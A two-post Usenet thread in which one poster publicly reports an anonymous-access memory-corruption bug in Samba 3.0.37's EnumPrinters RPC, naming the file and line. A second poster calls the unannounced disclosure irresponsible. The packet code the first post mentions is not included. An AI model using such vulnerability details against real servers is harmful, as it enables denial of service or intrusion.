

Newsgroup: comp.os.linux.security

[Samba 3.0.37] EnumPrinters memory consumption

Started by: "Gabriele Avosani" <g.avosani@gmail.com>
First post: 2015-05-18 18:56 +0200
Last post: 2015-05-19 18:04 +0100
Articles: 2, 2 participants


#646 — [Samba 3.0.37] EnumPrinters memory consumption

From: "Gabriele Avosani" <g.avosani@gmail.com>
Date: 2015-05-18 18:56 +0200
Subject: [Samba 3.0.37] EnumPrinters memory consumption
Message-ID: <mjd5k6$594$1@speranza.aioe.org>

Hello,
there is a bug in Samba 3.0.37 (latest) in the EnumPrinters RPC function
(anonymous access). The bug is in parse_prs.c:398: we take control of the length
and source pointer of a memcpy, leading to memory corruption, very fast
exhaustion of resources (block of computer very easy) and, probably, remote
code execution.

This is the packet code to be sent to port 445, EnumPrinters RPC function,
opcode 0x0.

Gabriele Avosani

P.S. Looking for a job as a remote programmer (short and long term). PHP, Perl,
Java, C/C++ and more (Linux and Windows), thanks in advance.




#647

From: Richard Kettlewell <rjk@greenend.org.uk>
Date: 2015-05-19 18:04 +0100
Message-ID: <wwv1tic1ou1.fsf@l1AntVDjLrnP7Td3DQJ8ynzIq3lJMueXf87AxnpFoA.invalid>
In reply to: #646

"Gabriele Avosani" <g.avosani@gmail.com> writes:
> there is a bug in Samba 3.0.37 (latest) in the EnumPrinters RPC function
> (anonymous access). The bug is in parse_prs.c:398: we take control of the length
> and source pointer of a memcpy, leading to memory corruption, very fast
> exhaustion of resources (block of computer very easy) and, probably, remote
> code execution.

samba.org says the latest version is 4.1.something.  If you think that
version is also vulnerable, you should contact the Samba team, ideally
in private.  Posting vulnerabilities to Usenet without allowing any time
for a fix to be deployed is rather irresponsible.

-- 
http://www.greenend.org.uk/rjk/
